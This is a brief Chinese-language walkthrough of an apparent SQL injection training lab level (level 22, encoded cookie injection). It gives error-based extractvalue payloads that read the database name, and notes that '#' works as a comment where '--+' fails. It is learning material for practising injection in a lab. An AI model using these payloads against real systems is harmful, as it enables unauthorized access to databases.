第二十二关cookie编码注入!
当我使用")编码后放入cookie中去请求发现报错了!说明很可能是")闭合的
没注入成功,试一下 " , ’ , ‘)这几种情况吧 或不输入单引号和双引号把爱
" and extractvalue(1,concat(’^’,(select database()),’^’)) --+ 注入失败
" and extractvalue(1,concat(’^’,(select database()),’^’)) # 注入成功
这里发现一个问题,在cookie注入时,使用–+进行注释是不行的,可以用#进行注入!!!